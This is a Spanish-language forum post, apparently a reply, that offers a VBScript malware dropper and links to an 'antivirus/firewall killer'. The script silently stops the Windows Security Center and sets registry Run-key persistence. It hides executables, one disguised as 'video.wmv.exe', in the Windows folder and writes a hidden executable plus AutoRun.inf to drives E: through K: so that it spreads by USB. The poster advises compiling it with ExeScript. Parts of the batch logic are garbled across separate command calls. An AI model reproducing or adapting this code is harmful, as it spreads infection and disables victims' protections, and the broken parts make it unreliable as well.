Acá tenes este killer
http://troyanosyvirus.com.ar/2008/02/av-firewall-killer.html que me mato al nod32v4 2011 pero ojo, es detectado yo una vez logre que sea detectado solo por 11 antivirus con pero...lo borre porque se que se pueden hacer virus sin destruir a un antivirus, eso ya es maldad.
pero proba con esto:
set cmd = createobject("wscript.shell" )
cmd.run "cmd /c #djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô ", vbHide
cmd.run "cmd /c net stop "Centro de seguridad" ", vbHide
cmd.run "cmd /c reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f ", vbHide
cmd.run "cmd /c reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe" ", vbHide
cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c attrib -s -r -h video.wmv.exe ", vbHide
cmd.run "cmd /c copy /y "video.wmv.exe" "%windir%\video.wmv.exe ", vbHide
cmd.run "cmd /c if exist c:\windows\video.wmv.exe start c:\windows\video.wmv.exe ", vbHide
cmd.run "cmd /c attrib -s -r -h junto.exe ", vbHide
cmd.run "cmd /c copy /y "junto.exe" "%windir%\junto.exe ", vbHide
cmd.run "cmd /c attrib -s -r -h prop.exe ", vbHide
cmd.run "cmd /c copy /y "prop.exe" "%windir%\prop.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h video.wmv.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h prop.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h junto.exe ", vbHide
cmd.run "cmd /c :bucle ", vbHide
cmd.run "cmd /c call :copiausb ", vbHide
cmd.run "cmd /c :copiausb ", vbHide
cmd.run "cmd /c if exist E: call :creausb E ", vbHide
cmd.run "cmd /c if exist F: call :creausb F ", vbHide
cmd.run "cmd /c if exist G: call :creausb G ", vbHide
cmd.run "cmd /c if exist H: call :creausb H ", vbHide
cmd.run "cmd /c if exist I: call :creausb I ", vbHide
cmd.run "cmd /c if exist J: call :creausb J ", vbHide
cmd.run "cmd /c if exist K: call :creausb K ", vbHide
cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c goto bucle ", vbHide
cmd.run "cmd /c goto :eof ", vbHide
cmd.run "cmd /c :creausb ", vbHide
cmd.run "cmd /c copy /y "%windir%\junto.exe" "%1:\junto.exe" ", vbHide
cmd.run "cmd /c attrib +s +r +h %1:\junto.exe ", vbHide
cmd.run "cmd /c echo [Autorun] > %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo open="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo icon=%SystemRoot%\system32\SHELL32.dll,4 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo action=Abrir carpeta para ver archivos >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shellexecute="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo UseAutoPlay=1 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\Install\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\explore\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo Shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c copy /y %windir%\AutoRun.inf "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c attrib +h +s +r "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c goto :eof ", vbHide
y convertirlo con el ExeScript.
Saludos y espero que te sirva...